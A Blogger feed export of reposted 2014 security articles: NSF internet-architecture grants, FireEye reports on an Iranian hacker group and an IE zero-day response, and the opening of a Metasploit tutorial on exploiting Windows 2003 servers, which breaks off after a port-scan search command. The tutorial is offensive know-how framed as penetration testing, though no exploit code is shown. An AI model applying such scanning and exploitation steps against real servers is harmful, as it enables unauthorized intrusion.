tag:blogger.com,1999:blog-49969808812567527692024-03-24T06:20:04.766-07:00Benny's Hub About Cyber SecurityEvents, news, technologies and products about cyber securityAnonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.comBlogger649125tag:blogger.com,1999:blog-4996980881256752769.post-89206161117864731412014-05-17T04:09:00.000-07:002014-05-17T04:09:21.020-07:00[infosecurity-magazine] NSF Awards $15m to Develop Secure Internet Architecture<h2 class="article-intro" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 1.3em; font-weight: 400; line-height: 1.4em; margin: 0px 0px 14px;">
The National Science Foundation (NSF) is awarding $15 million in grants for the development, deployment and testing of future internet architectures that are designed to enhance security, respond to emerging service challenges and increase scalability.</h2>
<div class="article-content" style="font-family: Calibri, Arial, Helvetica, sans-serif; font-size: 12px;">
<div style="line-height: 1.4em; margin-bottom: 12px;">
In 2010, the Directorate for Computer and Information Science and Engineering (CISE) at the NSF <a href="http://www.nsf.gov/news/news_summ.jsp?cntn_id=117611&org=OLPA&from=news" style="color: #e5141a; outline: none;" target="_blank">announced</a> awards for four projects, each worth up to $8 million over three years, as part of the Future Internet Architecture (FIA) program. The awards enabled researchers at dozens of institutions across the US to pursue new ways to build a more trustworthy and robust internet. That was mostly an exploratory phase; now, new grants are funding trial deployments for three of them to test the concepts in a real-world scenario.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“The objective of the new awards is to move the FIA efforts from the design stage to piloted deployments that assess how the designs work at large-scale and within challenging, realistic environments,” the NSF said. “Cities, non-profit organizations, academic institutions and industrial partners across the nation will collaborate with researchers to test the new designs.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Two notable projects from the cybersecurity perspective are Named Data Networking (NDN) and eXpressive Internet Architecture (XIA). The third awardee is the MobilityFirst project.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
"These projects are just the beginning of what it would take to create a full-scale Future Internet," said Keith Marzullo, director for NSF's Computer and Network Systems Division, "but the ultimate goal is the design and deployment of a network that serves all the needs of society."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
NDN will trade in the internet’s existing client-server model of interaction for a new model centered on content creation, dissemination and delivery. It will include mechanisms to support secure content-oriented functionality, regardless of the specific physical location where the content resides. The architecture thus moves the communication paradigm from today's focus on "where", i.e., addresses, servers and hosts, to "what", i.e., the content that users and applications care about.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
“By naming data instead of their location (IP address), NDN transforms data into first-class entities,” the NSF explained. “While the current Internet secures the communication channel or path between two communication points and sometimes the data with encryption, NDN secures the content and provides essential context for security.”</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
This approach allows the decoupling of trust in data from trust in hosts and servers, enabling trustworthiness as well as several radically scalable communication mechanisms; for example, automatic caching to optimize bandwidth and the potential to move content along multiple paths to the destination. This project addresses the technical challenges in creating NDN, including routing scalability, fast forwarding, trust models, network security, content protection and privacy, and a new fundamental communication theory enabling its design.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The NDN project is partnering with Open mHealth, a non-profit, patient-centric health ecosystem, and with UCLA Facilities Management, which operates the second largest Siemens building monitoring system on the West Coast, to test actual implementation.<br /><br />When it comes to XIA, researchers at Carnegie-Mellon University and three other institutions are planning to use a $5 million, two-year grant to test a next-generation internet architecture they've developed, geared to eliminate bottlenecks and incorporate intrinsic security features that can assure users that the websites they access and documents they download are legitimate.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
The trials will involve delivering online video on a national scale, and setting up a vehicular network in Pittsburgh.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
XIA also includes caching features – the researchers said the network will be able “to directly access content where it is most accessible, not necessarily on a host website.” The details of the actual deployments have yet to be worked out, <a href="http://www.cmu.edu/news/stories/archives/2014/may/may13_internetarchitecture.html" style="color: #e5141a; outline: none;" target="_blank">according to</a> Peter Steenkiste, professor of computer science and electrical and computer engineering at Carnegie-Mellon and XIA's principal investigator. However, in the online video case, it will probably involve various nodes spread across the US.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
In that trial, the researchers will test the XIA network's ability to eliminate bottlenecks in the transmission of video, which now accounts for a majority of internet traffic and is slated to grow and strain the network further. Loss of even a few data packets in a high-definition video stream is of course readily apparent, Steenkiste noted, so this will be a critical test of XIA's reliability.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Meanwhile, vehicles can use wireless communication channels called dedicated short-range communications, or DSRC, that are similar to Wi-Fi. Creating DSRC networks is challenging, however, because cars and trucks quickly pass from one DSRC access point to the next. Again, because XIA enables computer users to directly access content wherever it might be on the network, rather than always accessing a host website, it should enable vehicles to solve this issue.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Plans are underway to deploy XIA in a network in and around the CMU campus, or possibly piggybacking atop downtown Pittsburgh's free Wi-Fi network, to enable vehicles to share information about road and traffic conditions and to enable occupants to access the internet and entertainment options.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
Simply finding a way to evaluate network architectures will be part of the research effort, Steenkiste said, noting no widely accepted benchmarks yet exist. "It's not like the network is simply faster — it's more abstract than that," he explained. Security and reliability are some of the properties that must be evaluated.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
"These deployments will leverage, and enable us to deepen, our work on secure network operations, including providing a highly available infrastructure and secure authentication mechanisms," Steenkiste said. "They will enable us to build and test a robust XIA network and establish best practices for using our architecture, including support for mobility and enhanced cybersecurity."</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
XIA is designed to evolve with the internet, so that it will enable future users to accommodate communications with entities that no one has dreamed of yet, researchers said. Also it’s being architected so that it can be deployed piecemeal, so that the entire internet need not be transformed before people can start seeing XIA's benefits.</div>
<div style="line-height: 1.4em; margin-bottom: 12px;">
<a href="http://www.infosecurity-magazine.com/view/38434/nsf-awards-15m-to-develop-secure-internet-architecture/" target="_blank">http://www.infosecurity-magazine.com/view/38434/nsf-awards-15m-to-develop-secure-internet-architecture/</a></div>
</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com2tag:blogger.com,1999:blog-4996980881256752769.post-85379667546674484762014-05-17T04:06:00.001-07:002014-05-17T04:06:08.391-07:00[fireeye] Operation Saffron Rose<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
There is evolution and development underway within Iranian-based hacker groups that coincides with Iran’s efforts at controlling political dissent and expanding offensive cyber capabilities. The capabilities of threat actors operating from Iran have traditionally been considered limited and have focused on politically motivated website defacement and DDoS attacks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our team has <a href="http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">published a report</a> that documents the activities of an Iran-based group, known as the <strong>Ajax Security Team</strong>, which has been targeting both US defense companies as well as those in Iran who are using popular anti-censorship tools to bypass Internet censorship controls in the country.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This group, which has its roots in popular Iranian hacker forums such as <em>Ashiyane</em> and <em>Shabgard</em>, has engaged in website defacements since 2010. However, by 2014, this group had transitioned to malware-based espionage, using a methodology consistent with other advanced persistent threats in this region.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
It is unclear if the Ajax Security Team operates in isolation or if they are a part of a larger coordinated effort. We have observed this group leverage varied social engineering tactics as a means to lure their targets into infecting themselves with malware. They use malware tools that do not appear to be publicly available. Although we have not observed the use of exploits as a means to infect victims, members of the Ajax Security Team have previously used exploit code in web site defacement operations.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The objectives of this group are consistent with Iran’s efforts at controlling political dissent and expanding offensive cyber capabilities, but we believe that members of the group may also be dabbling in traditional cybercrime. This indicates that there is a considerable grey area between the cyber espionage capabilities of Iran’s hacker groups and any direct Iranian government or military involvement.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Although the Ajax Security Team’s capabilities remain unclear, we believe that their current operations have been somewhat successful. We assess that if these actors continue the current pace of their operations they will improve their capabilities in the mid-term.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
To view a full version of the report on “Operation Saffron Rose,” please visit: <a href="http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf" style="color: #4298b5; font-weight: bold; text-decoration: none;">http://www.fireeye.com/resources/pdfs/fireeye-operation-saffron-rose.pdf</a>.</div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-34771296983132339562014-05-17T04:05:00.001-07:002014-05-17T04:05:10.408-07:00[fireeye] Managed Defense – Reducing the Time to Detect and Resolve Threats<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Working in <a href="http://www.fireeye.com/products-and-solutions/managed-defense.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">FireEye Managed Defense</a> presents an interesting perspective into some of the most advanced threats. Our service meshes a team of experts with a powerful technology stack. We combine host- and network-based forensic technologies with highly experienced and skilled analysts, incident responders, and reverse engineers around the clock and across the globe. The foundation of Managed Defense is our partnership with our customers to detect evil and contain compromise. We work together to investigate the compromise, determine a remediation strategy, extract intelligence, and deploy new intelligence into our operations. This ability to leverage expertise to create intelligence and apply it consistently to the endpoint and to network traffic enables our team to adapt and respond quickly. In the face of a campaign like <a href="http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Operation Clandestine Fox</a>, it ensures our clients are protected from even the most advanced attacker groups.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The last 10 days have shown us once again why our mission of defeating the adversary is so critical. On Friday, April 25, we discovered a new IE 0-day exploited as part of a campaign later dubbed <a href="http://www.fireeye.com/blog/technical/targeted-attack/2014/05/operation-clandestine-fox-now-attacking-windows-xp-using-recently-discovered-ie-vulnerability.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Operation Clandestine Fox</a>. In this post, we present an inside look into the discovery and exploitation of this vulnerability and how we were able to help not only the original Managed Defense customer but also others.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>The Initial Detection</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
This story begins on April 25, when a group of our analysts working with a Managed Defense client detected an active APT backdoor using one of the many indicators of compromise (IOCs) we check for within Managed Defense</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
At first glance, it might have been reasonable to characterize the initial compromise as fairly typical. We knew at the time that the attackers had been able to deploy at least one backdoor, and were communicating interactively with it to escalate the attack. After containing the host, the usual questions emerged:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">How was the machine compromised?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Was the scope of the compromise limited to a single host?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">What did the attackers accomplish?</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Who was the Threat Actor behind the attack?</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
That evening, a deeper analysis of the host revealed that the backdoor was resident only in memory and communicating out to remote attacker infrastructure. While we had seen <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">similar malware variants</a>, analysis of JavaScript and Flash objects from this host indicated that we were possibly at the forefront of discovering a previously unknown vulnerability being exploited.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Evaluating the malware and the tactics employed pointed to a threat group that we had seen before. This group had been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>Expanding Detection Across Managed Defense</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The new 0-day was, of course, the big news. But just as important to our Managed Defense customers were lesser-known details that we tend to dig up every day on threats big and small.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
For instance, during the early stages of investigation, we produced evidence of the targeted spear phishing campaign that served as the initial attack vector. The campaign morphed four times, altering the content and remote locations of the payloads. Not only were we able to help our initial client detect and contain the threat, but continuously updating our applied intelligence led to other detections of the same campaign elsewhere.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Immediately after we deployed host-based indicators for the first-stage backdoor as well as network-based indicators for the command and control (C2) channels, we found a compromise at two additional Managed Defense customers. This meant we could pivot quickly into a focused investigation and response for our other customers – all of this in a matter of hours.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
The analysis performed within the first few hours allowed our team to deploy these network-based indicators across the globe and ensure that we were positioned between our customers and their adversaries to detect the attack early in the attack lifecycle. Not long after, as an added countermeasure, we further augmented our detection capability by deploying host-based indicators specifically focused on rapidly surfacing additional variants of the first-stage backdoor. All told, we built new intelligence around the phishing emails, the backdoors used, use of the 0-day exploit, and evidence of backdoor installation via an in-memory mutex. This is handy as memory-only enterprise sweeps are much faster than filesystem ones.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Within 24 hours, we had gathered and reviewed results from nearly a million endpoints across the Managed Defense customer base. The additional activity we observed solidified our theory that at least one APT threat actor group was broadly and aggressively targeting an array of key industries, including aerospace, energy, financial, and the federal sector.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
We published all of the intelligence we could glean as the investigation progressed so our customers could have insight on the threat actor and their tactics. This also supported customers discussing the threat with their peer groups to help drive the ultimate goal of protection, remediation and recovery.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Our work here resulted in new detection capabilities to find compromise through the attack lifecycle, ranging from initial targeting to successful exploitation and subsequent escalation through the establishment of more persistent backdoors. Thanks to our rapid deployment of relevant intelligence across our platform and the quick action of our clients, the eleven Managed Defense clients targeted by this campaign were all able to successfully contain the compromises at the initial stage, preventing further attacker activity within client environments.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<b>Looking Back (and Forward)</b></div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
Given the relative ubiquity of the vulnerability and the scope of the opportunity presented to attackers, we were unsurprised to see the attackers carry on through the week of April 28th. The Managed Defense team continued to work with our customers in a few ways:</div>
<ul style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 16.003000259399414px; margin: 0px; padding: 0px;">
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We continued to monitor our customers’ global infrastructure 24×7 for related activity;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">Over the course of 7 days, we published compromise reports that described related attacker activity at a dozen unique enterprises, spanning multiple industries;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We were easily able to pivot into Incident Response where necessary and applied additional horsepower to analyze a variety of forensic artifacts and accelerate response time;</li>
<li style="background-image: url(http://www.fireeye.com/images/common/bullet.png); background-position: 28px 6px; background-repeat: no-repeat no-repeat; line-height: 1.4em; list-style: none; margin: 0px; padding: 0px 0px 13px 44px;">We published additional intelligence to our customers so that each team could augment their own legacy detection capabilities and potentially prevent compromise.</li>
</ul>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
With <a href="https://technet.microsoft.com/en-US/library/security/2963983" style="color: #4298b5; font-weight: bold; text-decoration: none;" target="_blank">Microsoft’s recent patch release</a>, we’ve already witnessed a shift in attacker activity, including a substantial decrease in phishing activity. This once wide-open door is closing shut, but we know our adversaries’ unrelenting search for new attack surfaces undoubtedly continues. For those of us in Managed Defense, events like those detailed above are common occurrences, but they nonetheless serve as inspiring reminders of the gravity of our mission: to help protect our clients from skilled and determined adversaries. The best analysts in the industry, a global deployment of detection technology, superior threat intelligence, and an ability to rapidly escalate and deploy that new intelligence, when combined with the close partnerships we have with our clients ensures we are well prepared for the inevitable next round of attacks.</div>
<div style="background-color: white; color: #5b6770; font-family: arial, helvetica, clean, sans-serif; font-size: 13px; line-height: 1.4em; margin-bottom: 15px; padding: 0px;">
<a href="http://www.fireeye.com/blog/corporate/2014/05/managed-defense-reducing-the-time-to-detect-and-resolve-threats.html" target="_blank">http://www.fireeye.com/blog/corporate/2014/05/managed-defense-reducing-the-time-to-detect-and-resolve-threats.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-80015000042370739402014-05-08T17:20:00.004-07:002014-05-08T17:20:51.031-07:00[infosecinstitute] Exploiting Windows 2003 Server Reverse Shell<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
This paper is intended to explain several Metasploit approaches to exploit the vulnerable Windows 2003 server operating system, especially through <em>msfconsole </em>and<em> msfcli</em> modules, and demonstrates how to access the target computer in a comprehensive hacking life-cycle manner. Metasploit is quite useful in penetration testing, in terms of detecting vulnerabilities in the target Windows 2003 operating system, as well as for exploiting its loopholes. Metasploit could be utilized by both offensive and defensive professionals.</div>
<a name='more'></a><br />
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
Exploitation is about identifying a system’s potential exposures and exploiting its weaknesses. We used Nmap<em> </em>and Metasploit to identify potentially vulnerable services. From there we launched an exploit that gave us access to a system. We shall begin in this paper by covering the basics of exploitation execution using <em>msfconsole</em> and <em>msfcli</em> and compromising a target based on a discovered vulnerability.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Prerequisites</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The researcher is supposed to be quite handy with the operating of Metasploit commands and familiar with configuring several security settings such as firewall, port configuration, etc. in the Windows 2003 operating system. Moreover, the user machine must be configured with the subsequent tools:</div>
<ul style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<li>Backtrack 5 or Kali Linux</li>
<li>Metasploit Modules (msfconsole)</li>
<li>Windows 2003 Server</li>
</ul>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
<span style="font-size: 16pt;"><strong>Scanning the Target</strong></span></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
The Windows 2003 server is still used in several organizations to manipulate web servers, database servers, directory servers, FTP servers, and mail servers, but unfortunately it runs with several vulnerabilities, which easily attracts vicious hackers for unauthorized penetration. The question is how the hackers exploit an unpatched operating system, in fact the modus operandi of illicit infiltration.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
In this process, it is first mandatory to identify the target machine’s status for hackers; either it is live or down during exploitation. If the target is live, then port scanning should be performed, which determines the status of all TCP and UDP ports; either they are open or closed on the target machines. By means of an open port, there is a network service such as FTP, HTTPS, POP, and SMB listening on the port. If a network service is vulnerable, then the attacker might be able to use that information to speed up the vulnerability analysis process.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We can encounter the port scanning method by one of the special tools, for instance Nmap or Metasploit itself. Nmap has come into favor and is in fact a built-in vulnerability assessment tool of Backtrack or Kali Linux, and directly runs in the command shell, and generally asks the target IP address or DNS name as a parameter. Though there are plenty of services running on a particular computer, here we are scanning the target machine to discover specific running services such as FTP, HTTP, POP and SMB as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; text-align: center;">
<img alt="" class="lazy " data-original="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW2.png" src="http://resources.infosecinstitute.com/wp-content/uploads/050514_1359_ExploitingW2.png" style="border-style: none; display: inline; height: auto; max-width: 100%; vertical-align: top;" /></div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We can easily conclude from the aforesaid output that FTP, HTTP, and SMB services are running on the target machine, and in fact, they are not behind a firewall. So, we could penetrate that computer by exploiting these open services.</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
We can also enumerate the open service on a target computer by using Metasploit port scanning exploits itself. In this odyssey, run the <em>msfconsole</em> and first search the available port scanning exploits modules in the <em>msfconsole</em> as follows:</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<div class="syntaxhighlighter plain" id="highlighter_25313" style="font-size: 1em !important; margin: 1em 0px !important; overflow-x: auto !important; overflow-y: hidden !important; position: relative !important; width: 669px;">
<table border="0" cellpadding="0" cellspacing="0" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 669px;"><tbody style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="gutter" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
1</div>
</td><td class="code" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 639px;"><div class="container" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<div class="line number1 index0 alt2" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="plain plain" style="background-image: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">msf > search portscan</code></div>
</div>
</td></tr>
</tbody></table>
</div>
</div>
<div style="background-color: white; color: #747474; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px;">
